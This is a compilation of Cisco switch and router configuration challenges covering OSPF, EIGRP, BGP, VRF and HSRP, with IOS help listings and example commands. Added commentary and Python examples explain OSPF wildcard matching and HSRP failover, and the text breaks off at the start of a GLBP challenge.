(config)# router ?
bgp
Border Gateway Protocol (BGP)
egp
Exterior Gateway Protocol (EGP)
eigrp
Enhanced Interior Gateway Routing Protocol (EIGRP)
igrp
Interior Gateway Routing Protocol (IGRP)
isis
ISO IS-IS
iso-igrp IGRP for OSI networks
mobile
Mobile routes
odr
On Demand stub Routes
ospf
Open Shortest Path First (OSPF)
rip
Routing Information Protocol (RIP)
static
Static routes
(config)# router igrp ?
<1-65535> Autonomous system number
(config)# router igrp 111
(config-router)# ?
Router configuration commands:
default
Set a command to its defaults
default-information
Control distribution of default information
default-metric
Set metric of redistributed routes
distance
Define an administrative distance
distribute-list
Filter networks in routing updates
exit
Exit from routing protocol configuration mode
help
Description of the interactive help system
input-queue
Specify input queue depth
maximum-paths
Forward packets over multiple paths
metric
Modify IGRP routing metrics and parameters
neighbor
Specify a neighbor router

network Enable routing on an IP network
no Negate a command or set its defaults
offset-list Add or subtract offset from IGRP or RIP metrics
passive-interface Suppress routing updates on an interface
redistribute Redistribute information from another routing protocol
timers
Adjust routing timers
traffic-share
How to compute traffic share over alternate paths
validate-update-source Perform sanity checks against source address of
routing updates
variance
Control load balancing variance
(config-router)# network 1.2.3.0
(config-router)# neighbor 1.2.3.1
(config-router)# metric ?
holddown
Enable IGRP holddown
maximum-hops Advertise IGRP routes greater than <hops> as unreachable
weights
Modify IGRP metric coefficients
(config-router)# metric maximum-hops ?
<1-255> Hop count
(config-router)# metric maximum-hops 10
(config-router)# timers basic 10 10 10 10

Cisco Switch Challenge 72


Area: Switches IP Unicast Routing (IP Routing/OSPF)
Outline
This challenge involves enabling OSPF routing.
Objectives
The objectives of this challenge are to:
Enable IP routing.
Define OSPF.

The commands used are:


> enable
# config t
(config)# ip routing
(config)# router ospf 111
(config-router)# net 1.2.3.4 255.255.255.0 area 0

Example
> enable
# config t
(config)# ip routing


(config)# router ?
bgp
Border Gateway Protocol (BGP)
egp
Exterior Gateway Protocol (EGP)
eigrp
Enhanced Interior Gateway Routing Protocol (EIGRP)
igrp
Interior Gateway Routing Protocol (IGRP)
isis
ISO IS-IS
iso-igrp IGRP for OSI networks
mobile
Mobile routes
odr
On Demand stub Routes
ospf
Open Shortest Path First (OSPF)
rip
Routing Information Protocol (RIP)
static
Static routes
(config)# router ospf ?
<1-65535> Process ID
(config)# router ospf 111
(config-router)# ?
Router configuration commands:
area
OSPF area parameters
auto-cost
Calculate OSPF interface cost according to bandwidth
capability
Enable specific OSPF feature
compatible
OSPF compatibility list
default
Set a command to its defaults
default-information
Control distribution of default information
default-metric
Set metric of redistributed routes
discard-route
Enable or disable discard-route installation
distance
Define an administrative distance
distribute-list
Filter networks in routing updates
domain-id
OSPF domain-id
domain-tag
OSPF domain-tag
exit
Exit from routing protocol configuration mode
help
Description of the interactive help system
ignore
Do not complain about specific event
log-adjacency-changes Log changes in adjacency state
max-metric
Set maximum metric
maximum-paths
Forward packets over multiple paths
neighbor
Specify a neighbor router
network
Enable routing on an IP network
no
Negate a command or set its defaults
passive-interface
Suppress routing updates on an interface
redistribute
Redistribute information from another routing protocol
router-id
router-id for this OSPF process
summary-address
Configure IP address summaries
timers
Adjust routing timers
traffic-share
How to compute traffic share over alternate paths
(config-router)# net 1.2.3.4 ?
A.B.C.D OSPF wild card bits
(config-router)# net 1.2.3.4 255.255.255.0 ?
area Set the OSPF area ID
(config-router)# net 1.2.3.4 255.255.255.0 a ?
<0-4294967295> OSPF area ID as a decimal value
A.B.C.D
OSPF area ID in IP address format
(config-router)# net 1.2.3.4 255.255.255.0 a 0 ?
<cr>
(config-router)# net 1.2.3.4 255.255.255.0 area 0
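Which interfaces that network statement actually enables OSPF on, as an added example that is not part of the NetworkSims page: the help text above says "OSPF wild card bits", and a wildcard is the inverse of a subnet mask (a 1 bit means "don't care"). Typed with 255.255.255.0, the statement matches every interface whose address ends in .4, whatever the first three octets, and OSPF starts sending hellos and accepting neighbours on all of them. The Python below checks an address against a network statement, converts a mask to the wildcard form the command expects, and compares the statement as typed with the one that covers only 1.2.3.0/24. The interface addresses are constructed for the example; the precedence rule for overlapping statements (most specific wins) is an assumption about IOS behaviour, not something the page states.

```python
"""OSPF `network` wildcard matcher (added example, not NetworkSims code)."""
from ipaddress import IPv4Address


def _int(addr: str) -> int:
    return int(IPv4Address(addr))


def mask_to_wildcard(mask: str) -> str:
    """Convert a subnet mask to the wildcard form `network` expects (255.255.255.0 -> 0.0.0.255)."""
    return str(IPv4Address(_int(mask) ^ 0xFFFFFFFF))


def network_matches(stmt_addr: str, wildcard: str, iface_addr: str) -> bool:
    """True if iface_addr is covered by `network stmt_addr wildcard`:
    every bit that is 0 in the wildcard must be identical in both addresses."""
    care = _int(wildcard) ^ 0xFFFFFFFF
    return (_int(stmt_addr) & care) == (_int(iface_addr) & care)


def ospf_enabled_interfaces(statements, interfaces):
    """statements: [(addr, wildcard, area)]; interfaces: {name: address}.
    Returns {name: area} for every interface at least one statement covers,
    preferring the statement with the fewest wildcard bits (assumption)."""
    enabled = {}
    for name, addr in interfaces.items():
        best = None
        for stmt_addr, wildcard, area in statements:
            if network_matches(stmt_addr, wildcard, addr):
                specificity = bin(_int(wildcard)).count("1")
                if best is None or specificity < best[0]:
                    best = (specificity, area)
        if best is not None:
            enabled[name] = best[1]
    return enabled


# Constructed interface addresses for a switch with a few routed ports and SVIs.
INTERFACES = {
    "Fa0/1": "1.2.3.4",
    "Vlan10": "10.99.99.4",
    "Vlan20": "1.2.3.5",
    "Fa0/2": "192.168.7.4",
}


def compare_statements():
    """OSPF-enabled interfaces under the statement as typed in the challenge
    versus the statement that covers only the 1.2.3.0/24 segment."""
    as_typed = ospf_enabled_interfaces([("1.2.3.4", "255.255.255.0", 0)], INTERFACES)
    intended = ospf_enabled_interfaces(
        [("1.2.3.0", mask_to_wildcard("255.255.255.0"), 0)], INTERFACES)
    return as_typed, intended


if __name__ == "__main__":
    typed, intended = compare_statements()
    print("as typed :", sorted(typed))     # ['Fa0/1', 'Fa0/2', 'Vlan10']: every address ending in .4
    print("intended :", sorted(intended))  # ['Fa0/1', 'Vlan20']
```

Every interface the statement covers will form an adjacency with anything that answers its hellos, so when a wildcard is wider than intended, pair the statement with passive-interface default plus no passive-interface on the links that should peer, or configure OSPF per interface with ip ospf <process-id> area <area> instead of a network statement.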

Cisco Switch Challenge 73



Area: Switches IP Unicast Routing (IP Routing/OSPF)


Outline
This challenge involves enabling OSPF routing and setting OSPF parameters on an interface. The hello and dead intervals must match between neighbours, and the dead interval must be longer than the hello interval (by default four times it); the 10-second value used for both below exercises the commands but would leave a real adjacency one late hello away from being torn down.
Objectives
The objectives of this challenge are to:

Enable IP routing.
Define OSPF.
OSPF details on an interface.

The commands used are:


> enable
# config t
(config)# ip routing
(config)# router ospf 111
(config-router)# net 1.2.3.4 255.255.255.0 area 0
(config)# int fa0/1
(config-if)# ip ospf cost 10
(config-if)# ip ospf dead-interval 10
(config-if)# ip ospf hello-interval 10
(config-if)# ip ospf priority 10
(config-if)# ip ospf retransmit-interval 10
(config-if)# ip ospf transmit-delay 10

Example
> enable
# config t
(config)# ip routing
(config)# router ospf 111
(config-router)# net 1.2.3.4 255.255.255.0 area 0
(config-router)# exit
(config)# int fa0/1
(config-if)# ip ospf ?
authentication
Enable authentication
authentication-key
Authentication password (key)
cost
Interface cost
database-filter
Filter OSPF LSA during synchronization and flooding
dead-interval
Interval after which a neighbor is declared dead
demand-circuit
OSPF demand circuit
hello-interval
Time between HELLO packets
message-digest-key
Message digest authentication password (key)
mtu-ignore
Ignores the MTU in DBD packets
network
Network type
priority
Router priority
retransmit-interval Time between retransmitting lost link state
advertisements
transmit-delay
Link state transmit delay
(config-if)# ip ospf cost ?
<1-65535> Cost
(config-if)# ip ospf cost 10


(config-if)# ip ospf dead-interval ?
<1-65535> Seconds
(config-if)# ip ospf dead-interval 10
(config-if)# ip ospf hello-interval ?
<1-65535> Seconds
(config-if)# ip ospf hello-interval 10
(config-if)# ip ospf priority ?
<0-255> Priority
(config-if)# ip ospf priority 10
(config-if)# ip ospf retransmit-interval ?
<1-65535> Seconds
(config-if)# ip ospf retransmit-interval 10
(config-if)# ip ospf transmit-delay ?
<1-65535> Seconds
(config-if)# ip ospf transmit-delay 10

Cisco Switch Challenge 74


Area: Switches IP Unicast Routing (IP Routing/OSPF)
Outline
This challenge involves enabling OSPF routing and setting area parameters: message-digest authentication and a summary range for area 1. The network statement places FA0/1 in area 0, so the area 1 settings only take effect on interfaces that fall within area 1. Note also that a plain area 1 authentication entered after area 1 authentication message-digest replaces it and puts the area back on clear-text (type 1) authentication.
Objectives
The objectives of this challenge are to:

Enable IP routing.
Define OSPF.
OSPF area details.

The commands used are:


> enable
# config t
(config)# ip routing
(config)# router ospf 111
(config-router)# net 1.2.3.4 255.255.255.0 area 0
(config-router)# area 1 authentication message-digest
(config-router)# area 1 range 192.168.1.1 255.0.0.0
(config)# int fa0/1
(config-if)# ip ospf cost 10
(config-if)# ip ospf dead-interval 10
(config-if)# ip ospf hello-interval 10
(config-if)# ip ospf priority 10
(config-if)# ip ospf retransmit-interval 10
(config-if)# ip ospf transmit-delay 10

Example
> enable
# config t
(config)# ip routing
(config)# router ospf 111
(config-router)# net 1.2.3.4 255.255.255.0 area 0
(config-router)# ar ?
<0-4294967295> OSPF area ID as a decimal value
A.B.C.D OSPF area ID in IP address format
(config-router)# ar 1 authentication ?
message-digest Use message-digest authentication
<cr>
(config-router)# area 1 authentication message-digest
(config-router)# ar 1 r ?
A.B.C.D IP address to match
(config-router)# area 1 range 192.168.1.1 255.0.0.0
(config-router)# exit
(config)# int fa0/1
(config-if)# ip ospf ?
authentication
Enable authentication
authentication-key
Authentication password (key)
cost
Interface cost
database-filter
Filter OSPF LSA during synchronization and flooding
dead-interval
Interval after which a neighbor is declared dead
demand-circuit
OSPF demand circuit
hello-interval
Time between HELLO packets
message-digest-key
Message digest authentication password (key)
mtu-ignore
Ignores the MTU in DBD packets
network
Network type
priority
Router priority
retransmit-interval Time between retransmitting lost link state
advertisements
transmit-delay
Link state transmit delay
(config-if)# ip ospf cost 10
(config-if)# ip ospf dead-interval 10
(config-if)# ip ospf hello-interval 10
(config-if)# ip ospf priority 10
(config-if)# ip ospf retransmit-interval 10
(config-if)# ip ospf transmit-delay 10

Cisco Switch Challenge 75


Area: Switches IP Unicast Routing (IP Routing/EIGRP)
Outline
This challenge involves enabling EIGRP routing and setting EIGRP parameters on an interface (summary address, hello interval and hold time). The interface commands must name the same autonomous system number as the router eigrp process, otherwise they apply to a process that does not exist.


Objectives
The objectives of this challenge are to:

Enable IP routing.
Define EIGRP details.

The commands used are:


> enable
# config t
(config)# ip routing
(config)# router eigrp 111
(config-router)# eigrp log-neighbor-changes
(config-router)# network 10.0.0.0
(config-router)# exit
(config)# int fa0/1
(config-if)# ip summary-address eigrp 111 1.2.3.0 255.255.255.0
(config-if)# ip hello-interval eigrp 111 5
(config-if)# ip hold-time eigrp 111 15

Example
> enable
# config t
(config)# ip routing
(config)# router ?
bgp
Border Gateway Protocol (BGP)
egp
Exterior Gateway Protocol (EGP)
eigrp
Enhanced Interior Gateway Routing Protocol (EIGRP)
igrp
Interior Gateway Routing Protocol (IGRP)
isis
ISO IS-IS
iso-igrp IGRP for OSI networks
mobile
Mobile routes
odr
On Demand stub Routes
ospf
Open Shortest Path First (OSPF)
rip
Routing Information Protocol (RIP)
static
Static routes
(config)# router eigrp ?
<1-65535> Autonomous system number
(config)# router eigrp 111
(config-router)# ?
Router configuration commands:
auto-summary
Enable automatic network number summarization
default
Set a command to its defaults
default-information Control distribution of default information
default-metric
Set metric of redistributed routes
distance
Define an administrative distance
distribute-list
Filter networks in routing updates
eigrp
EIGRP specific commands
exit
Exit from routing protocol configuration mode
help
Description of the interactive help system
maximum-paths
Forward packets over multiple paths
metric
Modify IGRP routing metrics and parameters


neighbor
Specify a neighbor router
network
Enable routing on an IP network
no
Negate a command or set its defaults
offset-list
Add or subtract offset from IGRP or RIP metrics
passive-interface
Suppress routing updates on an interface
redistribute
Redistribute information from another routing protocol
timers
Adjust routing timers
traffic-share
How to compute traffic share over alternate paths
variance
Control load balancing variance
(config-router)# eigrp ?
log-neighbor-changes
Enable/Disable IP-EIGRP neighbor logging
log-neighbor-warnings Enable/Disable IP-EIGRP neighbor warnings
router-id
router-id for this EIGRP process
stub
Set IP-EIGRP as stubbed router
(config-router)# eigrp log-neighbor-changes
(config-router)# network 10.0.0.0
(config-router)# exit
(config)# int fa0/1
(config-if)# ip summary-address ?
eigrp Enhanced Interior Gateway Routing Protocol (EIGRP)
rip
Routing Information Protocol (RIP)
(config-if)# ip summary-address eigrp ?
<1-65535> Autonomous system number
(config-if)# ip summary-address eigrp 111 1.2.3.0 255.255.255.0
(config-if)# ip hello-interval ?
eigrp Enhanced Interior Gateway Routing Protocol (EIGRP)
(config-if)# ip hello-interval e ?
<1-65535> Autonomous system number
(config-if)# ip hello-interval e 111 5
(config-if)# ip hold-time ?
eigrp Enhanced Interior Gateway Routing Protocol (EIGRP)
(config-if)# ip hold-time eigrp ?
<1-65535> Autonomous system number
(config-if)# ip hold-time eigrp 111 ?
<1-65535> Seconds before neighbor is considered down
(config-if)# ip hold-time eigrp 111 15

Cisco Switch Challenge 76


Area: Switches IP Unicast Routing (IP Routing/BGP)
Outline
This challenge involves enabling BGP routing.
Objectives

The objectives of this challenge are to:

Enable IP routing.
Define BGP.
BGP AS details.

The commands used are:


> enable
# config t
(config)# ip routing
(config)# router bgp 111
(config-router)# network 1.2.3.0
(config-router)# neighbor 1.2.3.4 remote-as 130
(config-router)# exit
(config)# int fa0/1

Example
> enable
# config t
(config)# ip routing
(config)# router bgp 111
(config-router)# ?
Router configuration commands:
address-family
Enter Address Family command mode
aggregate-address
Configure BGP aggregate entries
auto-summary
Enable automatic network number summarization
bgp
BGP specific commands
default
Set a command to its defaults
default-information Control distribution of default information
default-metric
Set metric of redistributed routes
distance
Define an administrative distance
distribute-list
Filter networks in routing updates
exit
Exit from routing protocol configuration mode
help
Description of the interactive help system
maximum-paths
Forward packets over multiple paths
neighbor
Specify a neighbor router
network
Specify a network to announce via BGP
no
Negate a command or set its defaults
redistribute
Redistribute information from another routing protocol
synchronization
Perform IGP synchronization
table-map
Map external entry attributes into routing table
timers
Adjust routing timers
(config-router)# net ?
A.B.C.D Network number
(config-router)# net 1.2.3.0
(config-router)# nei ?
A.B.C.D Neighbor address
WORD
Neighbor tag
(config-router)# nei 1.2.3.4 ?
activate
Enable the Address Family for this Neighbor
advertise-map
specify route-map for conditional advertisement
advertisement-interval
Minimum interval between sending BGP routing updates
allowas-in
Accept as-path with my AS present in it
default-originate
Originate default route to this neighbor
description
Neighbor specific description

disable-connected-check one-hop away EBGP peer using loopback address
distribute-list Filter updates to/from this neighbor
ebgp-multihop Allow EBGP neighbors not on directly connected networks
filter-list Establish BGP filters
local-as Specify a local-as number
maximum-prefix Maximum number of prefix accept from this peer
next-hop-self Disable the next hop calculation for this neighbor
next-hop-unchanged Propagate the iBGP paths's next hop unchanged for this neighbor
password Set a password
peer-group Member of the peer-group
prefix-list Filter updates to/from this neighbor
remote-as Specify a BGP neighbor
remove-private-AS Remove private AS number from outbound updates
route-map Apply route map to neighbor
route-reflector-client Configure a neighbor as Route Reflector client
send-community Send Community attribute to this neighbor
shutdown Administratively shut down this neighbor
soft-reconfiguration Per neighbor soft reconfiguration
timers BGP per neighbor timers
translate-update Translate Update to MBGP format
unsuppress-map Route-map to selectively unsuppress suppressed routes
update-source Source of routing updates
version Set the BGP version to match a neighbor
weight Set default weight for routes from this neighbor
(config-router)# nei 1.2.3.4 remote-a ?
<1-65535> AS of remote neighbor
(config-router)# nei 1.2.3.4 remote-as 130 ?
<cr>
(config-router)# nei 1.2.3.4 remote-as 130
(config-router)# exit
(config)# int fa0/1

Cisco Switch Challenge 77


Area: Switches IP Unicast Routing (IP Routing/BGP)
Outline
This challenge involves enabling BGP routing.
Objectives
The objectives of this challenge are to:

Enable IP routing.
Define BGP.
BGP neighbor details.


The commands used are:


> enable
# config t
(config)# ip routing
(config)# router bgp 111
(config-router)# network 1.2.3.0
(config-router)# neighbor 1.2.3.4 remote-as 130
(config-router)# neighbor 1.2.3.4 next-hop-self
(config-router)# neighbor 1.2.3.4 weight 10
(config-router)# exit
(config)# int fa0/1

Example
> enable
# config t
(config)# ip routing
(config)# router bgp 111
(config-router)# ?
Router configuration commands:
address-family
Enter Address Family command mode
aggregate-address
Configure BGP aggregate entries
auto-summary
Enable automatic network number summarization
bgp
BGP specific commands
default
Set a command to its defaults
default-information Control distribution of default information
default-metric
Set metric of redistributed routes
distance
Define an administrative distance
distribute-list
Filter networks in routing updates
exit
Exit from routing protocol configuration mode
help
Description of the interactive help system
maximum-paths
Forward packets over multiple paths
neighbor
Specify a neighbor router
network
Specify a network to announce via BGP
no
Negate a command or set its defaults
redistribute
Redistribute information from another routing protocol
synchronization
Perform IGP synchronization
table-map
Map external entry attributes into routing table
timers
Adjust routing timers
(config-router)# net ?
A.B.C.D Network number
(config-router)# net 1.2.3.0
(config-router)# nei ?
A.B.C.D Neighbor address
WORD
Neighbor tag
(config-router)# nei 1.2.3.4 ?
activate
Enable the Address Family for this Neighbor
advertise-map
specify route-map for conditional advertisement
advertisement-interval
Minimum interval between sending BGP routing updates
allowas-in
Accept as-path with my AS present in it
default-originate
Originate default route to this neighbor
description
Neighbor specific description
disable-connected-check one-hop away EBGP peer using loopback address
distribute-list
Filter updates to/from this neighbor
ebgp-multihop
Allow EBGP neighbors not on directly connected
networks
filter-list
Establish BGP filters
local-as
Specify a local-as number

maximum-prefix Maximum number of prefix accept from this peer
next-hop-self Disable the next hop calculation for this neighbor
next-hop-unchanged Propagate the iBGP paths's next hop unchanged for this neighbor
password Set a password
peer-group Member of the peer-group
prefix-list Filter updates to/from this neighbor
remote-as Specify a BGP neighbor
remove-private-AS Remove private AS number from outbound updates
route-map Apply route map to neighbor
route-reflector-client Configure a neighbor as Route Reflector client
send-community Send Community attribute to this neighbor
shutdown Administratively shut down this neighbor
soft-reconfiguration Per neighbor soft reconfiguration
timers BGP per neighbor timers
translate-update Translate Update to MBGP format
unsuppress-map Route-map to selectively unsuppress suppressed routes
update-source Source of routing updates
version Set the BGP version to match a neighbor
weight Set default weight for routes from this neighbor
(config-router)# nei 1.2.3.4 remote-a ?
<1-65535> AS of remote neighbor
(config-router)# nei 1.2.3.4 remote-as 130 ?
<cr>
(config-router)# nei 1.2.3.4 remote-as 130
(config-router)# nei 1.2.3.4 next-hop-self
(config-router)# nei 1.2.3.4 w ?
<0-65535> default weight
(config-router)# nei 1.2.3.4 weight 10
(config-router)# exit
(config)# int fa0/1

Cisco Switch Challenge 78


Area: Switches IP Unicast Routing (IP Routing/BGP)
Outline
This challenge involves enabling BGP routing with a route-map applied to the routes received from a neighbour. The route-map matches community-list test, which has to be defined separately with ip community-list; and because every route-map ends with an implicit deny, an inbound map whose only sequence is a match drops every route that does not match it.
Objectives
The objectives of this challenge are to:

Enable IP routing.
Define BGP.
BGP neighbor details with a route-map.


The commands used are:


> enable
# config t
(config)# ip routing
(config)# route-map TESTING permit 10
(config-route-map)# match community test
(config-route-map)# set community 111:100
(config-route-map)# exit
(config)# router bgp 111
(config-router)# neighbor 1.2.3.4 remote-as 130
(config-router)# neighbor 1.2.3.4 route-map TESTING in

Example
> enable
# config t
(config)# ip routing
(config)# route-map TESTING permit 10
(config-route-map)# ?
Route Map configuration commands:
default
Set a command to its defaults
description Route-map comment
exit
Exit from route-map configuration mode
help
Description of the interactive help system
match
Match values from routing table
no
Negate a command or set its defaults
set
Set values in destination routing protocol
(config-route-map)# match ?
as-path
Match BGP AS path list
community
Match BGP community list
extcommunity Match BGP/VPN extended community list
interface
Match first hop interface of route
ip
IP specific information
length
Packet length
metric
Match metric of route
route-type
Match route-type of route
tag
Match tag of route
(config-route-map)# match community ?
<1-99>
Community-list number (standard)
<100-199> Community-list number (expanded)
WORD
Community-list name
(config-route-map)# match community test
(config-route-map)# set ?
as-path Prepend string for a BGP AS-path attribute
automatic-tag Automatically compute TAG value
comm-list set BGP community list (for deletion)
community BGP community attribute
dampening Set BGP route flap dampening parameters
default Set default information
extcommunity BGP extended community attribute
interface Output interface
ip IP specific information
level Where to import route
local-preference BGP local preference path attribute
metric Metric value for destination routing protocol
metric-type Type of metric for destination routing protocol
origin BGP origin code
tag Tag value for destination routing protocol
traffic-index BGP traffic classification number for accounting
weight BGP weight for routing table
(config-route-map)# set community ?


<1-4294967295> community number
aa:nn
community number in aa:nn format
additive
Add to the existing community
internet
Internet (well-known community)
local-AS
Do not send outside local AS (well-known community)
no-advertise
Do not advertise to any peer (well-known community)
no-export
Do not export to next AS (well-known community)
none
No community attribute
<cr>
(config-route-map)# set community 111:100
(config-route-map)# exit
(config)# router bgp 111
(config-router)# neighbor ?
  A.B.C.D  Neighbor address
  WORD     Neighbor tag
(config-router)# neighbor 1.2.3.4 ?
  activate                 Enable the Address Family for this Neighbor
  advertise-map            specify route-map for conditional advertisement
  advertisement-interval   Minimum interval between sending BGP routing updates
  allowas-in               Accept as-path with my AS present in it
  default-originate        Originate default route to this neighbor
  description              Neighbor specific description
  disable-connected-check  one-hop away EBGP peer using loopback address
  distribute-list          Filter updates to/from this neighbor
  ebgp-multihop            Allow EBGP neighbors not on directly connected networks
  filter-list              Establish BGP filters
  local-as                 Specify a local-as number
  maximum-prefix           Maximum number of prefix accept from this peer
  next-hop-self            Disable the next hop calculation for this neighbor
  next-hop-unchanged       Propagate the iBGP paths's next hop unchanged for this neighbor
  password                 Set a password
  peer-group               Member of the peer-group
  prefix-list              Filter updates to/from this neighbor
  remote-as                Specify a BGP neighbor
  remove-private-AS        Remove private AS number from outbound updates
  route-map                Apply route map to neighbor
  route-reflector-client   Configure a neighbor as Route Reflector client
  send-community           Send Community attribute to this neighbor
  shutdown                 Administratively shut down this neighbor
  soft-reconfiguration     Per neighbor soft reconfiguration
  timers                   BGP per neighbor timers
  translate-update         Translate Update to MBGP format
  unsuppress-map           Route-map to selectively unsuppress suppressed routes
  update-source            Source of routing updates
  version                  Set the BGP version to match a neighbor
  weight                   Set default weight for routes from this neighbor
(config-router)# neighbor 1.2.3.4 route-m ?
WORD Name of route map
(config-router)# neighbor 1.2.3.4 route-m TESTING

Cisco Switch Challenge 79


Area: Switches IP Unicast Routing (IP Routing/BGP)


Outline
This challenge involves enabling VRF (VPN Routing/Forwarding).
Objectives
The objectives of this challenge are to:

Enable IP routing.
Define VRF.
Apply VRF forwarding on an interface.

The commands used are:


> enable
# config t
(config)# ip routing
(config)# route-map TESTING permit 10
(config)# ip vrf NEWV
(config-vrf)# input m TESTING
(config-vrf)# rd 192.168.1.1:12
(config-vrf)# exit
(config)# int fa0/1
(config-if)# ip vrf forwarding NEWV

Example
> enable
# config t
(config)# ip routing
(config)# route-map TESTING permit 10
(config)# ip vrf NEWV
(config-vrf)# ?
IP VPN Routing/Forwarding instance configuration commands:
  default       Set a command to its defaults
  description   VRF specific description
  exit          Exit from VRF configuration mode
  export        VRF export
  import        VRF import
  maximum       Set a limit
  no            Negate a command or set its defaults
  rd            Specify Route Distinguisher
  route-target  Specify Target VPN Extended Communities
(config-vrf)# input ?
  map  Route-map based VRF import
(config-vrf)# input m ?
  WORD  VRF import route-map name
(config-vrf)# input m TESTING
(config-vrf)# rd ?
  ASN:nn or IP-address:nn  VPN Route Distinguisher

(config-vrf)# rd 192.168.1.1:12 ?
<cr>
(config-vrf)# rd 192.168.1.1:12
(config-vrf)# exit
(config)# int fa0/1
(config-if)# ip vrf ?
  forwarding  Configure forwarding table
  sitemap     Configure route-map for routes received from this site
(config-if)# ip vrf forwarding ?
  WORD  Table name
(config-if)# ip vrf forwarding NEWV

Cisco Switch Test 5 (Challenge 80)


Unit 5: Multilayer Switching
The most up-to-date version of this test is at:
http://networksims.com/sw05.html

Cisco Switch Challenge 81


Outline
This challenge involves the configuration of hot standby (HSRP).
Objectives
The objectives of this challenge are to:

Define the standby port.


Define HSRP parameters.

Example
Switch# config t
Switch(config)# int fa0/1
Switch(config-if)# no switchport
Switch(config-if)# standby ?
  <0-255>         group number
  authentication  Authentication
  delay           HSRP initialisation delay
  ip              Enable HSRP and set the virtual IP address
  name            Redundancy name string
  preempt         Overthrow lower priority designated routers
  priority        Priority level
  timers          Hello and hold timers
  track           Priority tracking
Switch(config-if)# standby ip ?
A.B.C.D Virtual IP address
<cr>
Switch(config-if)# standby ip 192.168.128.3
Switch(config-if)# standby priority ?
<0-255> Priority value
Switch(config-if)# standby priority 120 ?
preempt Overthrow lower priority designated routers
<cr>
Switch(config-if)# standby priority 120 preempt ?
delay Wait before preempting
<cr>
Switch(config-if)# standby priority 120 preempt delay ?
  <0-3600>  Number of seconds to delay
  minimum   Delay at least this long
  sync      Wait for IP redundancy clients
Switch(config-if)# standby priority 120 preempt delay 300
Switch(config-if)# end
Switch# sh sta
FastEthernet0/1 - Group 0
Local state is Init (interface down), priority 120, may preempt
Preemption delayed for at least 300 secs
Hellotime 3 sec, holdtime 10 sec
Virtual IP address is 192.168.128.3 configured
Active router is unknown
Standby router is unknown
0 state changes, last state change never
IP redundancy name is "hsrp-Fa0/1-0" (default)

Explanation

HSRP uses an active router, a standby router and a virtual router. The active router is the
normal forwarding gateway; the standby router listens to the traffic going to and from the
active device and exchanges HELLO packets with it. If the standby router detects a failure of
the active device it takes over the group's virtual IP address and virtual MAC address, so that
hosts do not notice the failure of the main device. The objective is thus to give the hosts a
consistent gateway address. HSRP allows the switch to provide failover for another device.
HSRP is activated with the standby ip interface configuration command. If an IP address is
given in this command it is used as the standby (virtual) address; otherwise it is learned
from the other routers in the standby group.


Ref:
http://www.cisco.com/en/US/products/hw/switches/ps5023/products_configuration_guide_chapter09186a008047646d.html#wp1059790
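The election and failover behaviour described in the explanation above, as an added example in Python (not NetworkSims' code). It models one standby group: the router with the highest priority (ties broken by the highest interface address) becomes Active, the next becomes Standby, a failed Active is replaced by the Standby, and a returning higher-priority router takes the Active role back only when it has preempt configured. Router names, addresses and priorities are constructed sample data, and the hello/holdtime exchange is replaced by explicit fail and recover events.

```python
"""HSRP active/standby election model (added example, not NetworkSims' code)."""
from dataclasses import dataclass
from ipaddress import IPv4Address
from typing import List, Optional, Tuple


@dataclass
class HsrpRouter:
    name: str
    ip: str                 # real interface address, used as the tie-breaker
    priority: int = 100     # IOS default priority
    preempt: bool = False   # IOS default: do not displace a running Active router
    alive: bool = True

    def rank(self) -> Tuple[int, int]:
        # Election order: highest priority wins, then highest interface IP.
        return (self.priority, int(IPv4Address(self.ip)))


class HsrpGroup:
    """One standby group sharing a virtual IP (the 'standby ip' address)."""

    def __init__(self, virtual_ip: str, routers: List[HsrpRouter]):
        self.virtual_ip = virtual_ip
        self.routers = {r.name: r for r in routers}
        self.active: Optional[str] = None
        self.standby: Optional[str] = None
        self.state_changes = 0
        self.elect()

    def _ranked(self) -> List[HsrpRouter]:
        return sorted((r for r in self.routers.values() if r.alive),
                      key=HsrpRouter.rank, reverse=True)

    def elect(self) -> Tuple[Optional[str], Optional[str]]:
        """Re-run the election after a topology event; returns (active, standby)."""
        ranked = self._ranked()
        incumbent = self.routers.get(self.active) if self.active else None
        if incumbent is not None and not incumbent.alive:
            incumbent = None          # hold timer expired: the Active router is gone
        if incumbent is None:
            new_active = ranked[0].name if ranked else None
        else:
            new_active = incumbent.name
            best = ranked[0]
            # Only a router configured with 'standby preempt' may displace a live
            # Active router, and only if it ranks strictly higher.
            if best.name != incumbent.name and best.preempt and best.rank() > incumbent.rank():
                new_active = best.name
        # The Standby role always goes to the best remaining router; no preempt needed.
        new_standby = next((r.name for r in ranked if r.name != new_active), None)
        if (new_active, new_standby) != (self.active, self.standby):
            self.state_changes += 1
        self.active, self.standby = new_active, new_standby
        return self.active, self.standby

    def fail(self, name: str) -> Tuple[Optional[str], Optional[str]]:
        self.routers[name].alive = False
        return self.elect()

    def recover(self, name: str) -> Tuple[Optional[str], Optional[str]]:
        self.routers[name].alive = True
        return self.elect()


def failover_sequence(preempt: bool) -> List[Tuple[str, Optional[str], Optional[str]]]:
    """Constructed scenario: R1 is preferred, fails, then comes back."""
    group = HsrpGroup("192.168.128.3", [
        HsrpRouter("R1", "192.168.128.1", priority=120, preempt=preempt),
        HsrpRouter("R2", "192.168.128.2", priority=100),
        HsrpRouter("R3", "192.168.128.4", priority=90),
    ])
    log = [("start",) + (group.active, group.standby)]
    log.append(("R1 fails",) + group.fail("R1"))
    log.append(("R1 recovers",) + group.recover("R1"))
    return log


if __name__ == "__main__":
    for row in failover_sequence(preempt=True):
        print(row)
```

Run with preempt set to True the sequence ends with R1 Active again; with False, R2 stays Active and R1 only becomes Standby. Because the outcome is decided purely by the priority and preempt values carried in hello packets, the authentication option shown in the standby ? listing is what keeps an unauthorised device on the segment from winning this election; the model deliberately leaves authentication out.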

Cisco Switch Challenge 82


Outline
This challenge involves the configuration of multiple hot standby (MHSRP).
Objectives
The objectives of this challenge are to:

Define the standby port.


Define MHSRP parameters.

Example
Switch# config t
Switch(config)# interface fa0/1
Switch(config-if)# ip address 10.0.0.1 255.255.255.0
Switch(config-if)# no switchport
Switch(config-if)# standby 1 ip 10.0.0.3
Switch(config-if)# standby 1 priority 110
Switch(config-if)# standby 1 preempt
Switch(config-if)# standby 2 ip 10.0.0.4
Switch(config-if)# standby 2 preempt
Switch(config-if)# end

Cisco Router Challenge 209


Outline
Gateway Load Balancing Protocol (GLBP), in the same way as Hot Standby Router Protocol
(HSRP) and Virtual Router Redundancy Protocol (VRRP), provides an alternative route for
network traffic from a failed router or circuit. It also supports load sharing between a group
of redundant routers. This challenge involves the configuration of GLBP.
Objectives
The objectives of this challenge are to:

Define GLBP details.


